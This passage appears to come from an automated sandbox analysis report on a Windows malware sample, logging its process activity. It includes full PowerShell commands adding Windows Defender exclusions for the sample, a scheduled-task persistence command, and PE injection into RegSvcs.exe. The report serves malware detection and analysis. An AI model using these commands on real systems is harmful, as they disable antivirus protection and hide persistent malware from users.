                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95012
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94905
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94777
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94669
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94319
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeThread delayed: delay time: 922337203685477
                    Source: RegSvcs.exe, 00000009.00000002.2138116627.0000000005880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                    Source: RegSvcs.exe, 0000000E.00000002.3313067108.00000000064D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe"
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3E3008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1062008Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeQueries volume information: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeQueries volume information: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\qZeUnR\qZeUnR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
